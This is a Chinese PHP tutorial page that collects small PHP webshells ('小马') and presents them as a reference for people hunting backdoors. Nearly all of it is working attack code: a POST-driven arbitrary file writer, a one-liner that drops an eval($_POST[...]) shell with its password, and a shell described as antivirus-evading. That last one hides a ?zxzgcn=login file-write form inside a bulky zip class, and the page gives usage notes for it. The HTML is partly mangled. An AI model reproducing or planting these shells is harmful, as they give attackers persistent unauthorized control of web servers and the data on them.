超小PHP小马小结(方便查找后门的朋友)_PHP教程

<br><!--?php <BR-->header("content-Type: text/html; charset=gb2312"); <br>if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); <br>?> <br> <br> <br><!--? <BR-->if(!(isset($_POST["data"]) && isset($_POST["dir"]))) <br>exit(); <br>if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) <br>{ <br>$p_File=fopen($_POST["dir"],"a"); <br>if(!$p_File) <br>echo "写入失败！请换个目录试试！"; <br>else <br>echo "Ok！！ "; <br>fputs($p_File,$_POST["data"]); <br>fclose($p_File); <br>} <br>else <br>echo "请把数据填写完整！"; <br>?> <br> <br>php一句话小马的后门 <br><span style="CURSOR: pointer" onclick="doCopy('code9555')"><u></u></span> 代码如下:<pre class="brush:php;toolbar:false layui-box layui-code-view layui-code-notepad"><ol class="layui-code-ol"><li><br><!--?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?-->)?> <br> <br>这样访问之后，在当前目录生成jb51.php 内容为 <!--?eval($_POST[jb51]);?-->)?> 的一句话小马，密码为 jb51 <br><strong>最新免杀php小马</strong> <br><span style="CURSOR: pointer" onclick="doCopy('code49076')"><u></u></span> 代码如下:<pre class="brush:php;toolbar:false layui-box layui-code-view layui-code-notepad"><ol class="layui-code-ol"><li><br><!--?php <BR-->class zip <br>{ <br>var $datasec, $ctrl_dir = array(); <br>var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; <br>var $old_offset = 0; var $dirs = Array("."); <br>function get_List($zip_name) <br>{ <br>$ret = ''; <br>$zip = @fopen($zip_name, 'rb'); <br>if(!$zip) return(0); <br>$centd = $this->ReadCentralDir($zip,$zip_name); <br>@rewind($zip); <br>@fseek($zip, $centd['offset']); <br>for ($i=0; $i<$centd['entries']; $i++) <br>{ <br>$header = $this->ReadCentralFileHeaders($zip); <br>$header['index'] = $i;$info['filename'] = $header['filename']; <br>$info['stored_filename'] = $header['stored_filename']; <br>$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; <br>$info['crc'] = strtoupper(dechex( $header['crc'] )); <br>$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; <br>$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; <br>$info['index'] = $header['index'];$info['status'] = $header['status']; <br>$ret[]=$info; unset($header); <br>} <br>return $ret; <br>} <br>function Add($files,$compact) <br>{ <br>if(!is_array($files[0])) $files=Array($files); <br>for($i=0;$files[$i];$i++){ <br>$fn = $files[$i]; <br>if(!in_Array(dirname($fn[0]),$this->dirs)) <br>$this->add_Dir(dirname($fn[0])); <br>if(basename($fn[0])) <br>$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); <br>} <br>return $ret; <br>} <br>function get_file() <br>{ <br>$data = implode('', $this -> datasec); <br>$ctrldir = implode('', $this -> ctrl_dir); <br>return $data . $ctrldir . $this -> eof_ctrl_dir . <br>pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). <br>pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; <br>} <br>function add_dir($name) <br>{ <br>$name = str_replace("\\", "/", $name); <br>$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; <br>$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); <br>$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); <br>$this -> datasec[] = $fr; <br>$new_offset = strlen(implode("", $this->datasec)); <br>$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; <br>$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); <br>$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); <br>$ext = "\xff\xff\xff\xff"; <br>$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; <br>$this -> ctrl_dir[] = $cdrec; <br>$this -> old_offset = $new_offset; <br>$this -> dirs[] = $name; <br>} <br>function add_File($data, $name, $compact = 1) <br>{ <br>$name = str_replace('\\', '/', $name); <br>$dtime = dechex($this->DosTime()); <br>$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] <br>. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; <br>eval('$hexdtime = "' . $hexdtime . '";'); <br>if($compact) <br>$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; <br>else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; <br>$unc_len = strlen($data); $crc = crc32($data); <br>if($compact){ <br>$zdata = gzcompress($data); $c_len = strlen($zdata); <br>$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); <br>}else{ <br>$zdata = $data; <br>} <br>$c_len=strlen($zdata); <br>$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; <br>$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$this -> datasec[] = $fr; <br>$new_offset = strlen(implode('', $this->datasec)); <br>if($compact) <br>$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; <br>else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; <br>$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); <br>$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); <br>$cdrec .= pack('V', $this -> old_offset ); <br>$this -> old_offset = $new_offset; <br>$cdrec .= $name; <br>$this -> ctrl_dir[] = $cdrec; <br>return true; <br>} <br>function DosTime() { <br>$timearray = getdate(); <br>if ($timearray['year'] < 1980) { <br>$timearray['year'] = 1980; $timearray['mon'] = 1; <br>$timearray['mday'] = 1; $timearray['hours'] = 0; <br>$timearray['minutes'] = 0; $timearray['seconds'] = 0; <br>} <br>return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | <br>($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); <br>} <br>//解压整个压缩包 <br>//直接用 Extract 会有路径问题，本函数先从列表中获得文件信息并创建好所有目录然后才运行 Extract <br>function ExtractAll ( $zn, $to) <br>{ <br>if(substr($to,-1)!="/") $to .= "/"; <br>$files = $this->get_List($zn); <br>$cn = count($files); <br>if(is_array($files)) <br>{ <br>for($i=0;$i<$cn;$i++) <br>{ <br>if($files[$i]['folder']==1){ <br>@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); <br>@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); <br>} <br>} <br>} <br>$this->Extract ($zn,$to); <br>} <br>function Extract ( $zn, $to, $index = Array(-1) ) <br>{ <br>$ok = 0; $zip = @fopen($zn,'rb'); <br>if(!$zip) return(-1); <br>$cdir = $this->ReadCentralDir($zip,$zn); <br>$pos_entry = $cdir['offset']; <br>if(!is_array($index)){ $index = array($index); } <br>for($i=0; isset($index[$i]);$i++){ <br>if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) <br>return(-1); <br>} <br>for ($i=0; $i<$cdir['entries']; $i++) <br>{ <br>@fseek($zip, $pos_entry); <br>$header = $this->ReadCentralFileHeaders($zip); <br>$header['index'] = $i; $pos_entry = ftell($zip); <br>@rewind($zip); fseek($zip, $header['offset']); <br>if(in_array("-1",$index)||in_array($i,$index)) <br>$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); <br>} <br>fclose($zip); <br>return $stat; <br>} <br>function ReadFileHeader($zip) <br>{ <br>$binary_data = fread($zip, 30); <br>$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); <br>$header['filename'] = fread($zip, $data['filename_len']); <br>if ($data['extra_len'] != 0) { <br>$header['extra'] = fread($zip, $data['extra_len']); <br>} else { $header['extra'] = ''; } <br>$header['compression'] = $data['compression'];$header['size'] = $data['size']; <br>$header['compressed_size'] = $data['compressed_size']; <br>$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; <br>$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; <br>if ($header['mdate'] && $header['mtime']){ <br>$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; <br>$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; <br>$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; <br>$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); <br>}else{$header['mtime'] = time();} <br>$header['stored_filename'] = $header['filename']; <br>$header['status'] = "ok"; <br>return $header; <br>} <br>function ReadCentralFileHeaders($zip){ <br>$binary_data = fread($zip, 46); <br>$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); <br>if ($header['filename_len'] != 0) <br>$header['filename'] = fread($zip,$header['filename_len']); <br>else $header['filename'] = ''; <br>if ($header['extra_len'] != 0) <br>$header['extra'] = fread($zip, $header['extra_len']); <br>else $header['extra'] = ''; <br>if ($header['comment_len'] != 0) <br>$header['comment'] = fread($zip, $header['comment_len']); <br>else $header['comment'] = ''; <br>if ($header['mdate'] && $header['mtime']) <br>{ <br>$hour = ($header['mtime'] & 0xF800) >> 11; <br>$minute = ($header['mtime'] & 0x07E0) >> 5; <br>$seconde = ($header['mtime'] & 0x001F)*2; <br>$year = (($header['mdate'] & 0xFE00) >> 9) + 1980; <br>$month = ($header['mdate'] & 0x01E0) >> 5; <br>$day = $header['mdate'] & 0x001F; <br>$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); <br>} else { <br>$header['mtime'] = time(); <br>} <br>$header['stored_filename'] = $header['filename']; <br>$header['status'] = 'ok'; <br>if (substr($header['filename'], -1) == '/') <br>$header['external'] = 0x41FF0010; <br>return $header; <br>} <br>function ReadCentralDir($zip,$zip_name) <br>{ <br>$size = filesize($zip_name); <br>if ($size < 277) $maximum_size = $size; <br>else $maximum_size=277; <br>@fseek($zip, $size-$maximum_size); <br>$pos = ftell($zip); $bytes = 0x00000000; <br>while ($pos < $size) <br>{ <br>$byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); <br>if ($bytes == 0x504b0506){ $pos++; break; } $pos++; <br>} <br>$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); <br>if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); <br>else $centd['comment'] = ''; $centd['entries'] = $data['entries']; <br>$centd['disk_entries'] = $data['disk_entries']; <br>$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; <br>$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; <br>return $centd; <br>} <br>function ExtractFile($header,$to,$zip) <br>{ <br>$header = $this->readfileheader($zip); <br>$header['external'] = (!isset($header['external']) ? 0 : $header['external']); <br>if(substr($to,-1)!="/") $to.="/"; <br>if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); <br>if (!($header['external']==0x41FF0010)&&!($header['external']==16)) <br>{ <br>if ($header['compression']==0) <br>{ <br>$fp = @fopen($to.$header['filename'], 'wb'); <br>if(!$fp) return(-1); <br>$size = $header['compressed_size']; <br>while ($size != 0) <br>{ <br>$read_size = ($size < 2048 ? $size : 2048); <br>$buffer = fread($zip, $read_size); <br>$binary_data = pack('a'.$read_size, $buffer); <br>@fwrite($fp, $binary_data, $read_size); <br>$size -= $read_size; <br>} <br>fclose($fp); <br>touch($to.$header['filename'], $header['mtime']); <br>}else{ <br>$fp = @fopen($to.$header['filename'].'.gz','wb'); <br>if(!$fp) return(-1); <br>$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), <br>Chr(0x00), time(), Chr(0x00), Chr(3)); <br>fwrite($fp, $binary_data, 10); <br>$size = $header['compressed_size']; <br>while ($size != 0) <br>{ <br>$read_size = ($size < 1024 ? $size : 1024); <br>$buffer = fread($zip, $read_size); <br>$binary_data = pack('a'.$read_size, $buffer); <br>@fwrite($fp, $binary_data, $read_size); <br>$size -= $read_size; <br>} <br>$binary_data = pack('VV', $header['crc'], $header['size']); <br>fwrite($fp, $binary_data,8); fclose($fp); <br>$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); <br>if(!$gzp) return(-2); <br>$fp = @fopen($to.$header['filename'],'wb'); <br>if(!$fp) return(-1); <br>$size = $header['size']; <br>while ($size != 0) <br>{ <br>$read_size = ($size < 2048 ? $size : 2048); <br>$buffer = gzread($gzp, $read_size); <br>$binary_data = pack('a'.$read_size, $buffer); <br>@fwrite($fp, $binary_data, $read_size); <br>$size -= $read_size; <br>} <br>fclose($fp); gzclose($gzp); <br>touch($to.$header['filename'], $header['mtime']); <br>@unlink($to.$header['filename'].'.gz'); <br>}} <br>return true; <br>} <br>} <br>if($_GET['zxzgcn']=='login'){ <br>header("content-Type: text/html; charset=gb2312"); <br>if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); <br>?> <br><form method="POST"> <br>save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> <br><br><br> <br><textarea name="text" cols="70" rows="18"></textarea> <br><br><br> <br><input type="submit" name="submit" value="save"> <br> <br><!--?php <BR-->if(isset($_POST['file'])) <br>{ <br>$fp = @fopen($_POST['file'],'wb'); <br>echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; <br>@fclose($fp); <br>} <br>} <br>?> <br> <br>用法xxx.php?zxzgcn=login</li><li><p></p></li><li><p align="left"><span id="url" itemprop="url">http://www.bkjia.com/PHPjc/325284.html</span><span id="indexUrl" itemprop="indexUrl">www.bkjia.com</span><span id="isOriginal" itemprop="isOriginal">true</span><span id="isBasedOnUrl" itemprop="isBasedOnUrl">http://www.bkjia.com/PHPjc/325284.html</span><span id="genre" itemprop="genre">TechArticle</span><span id="description" itemprop="description">作者: spider 我也来个超小PHP小马  代码如下:</span></p><pre class="brush:php;toolbar:false layui-box layui-code-view layui-code-notepad"><ol class="layui-code-ol"><li>?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=$v) $_P...<p></p></li><li>                    </li></ol></pre></form></li></ol></pre></li></ol></pre>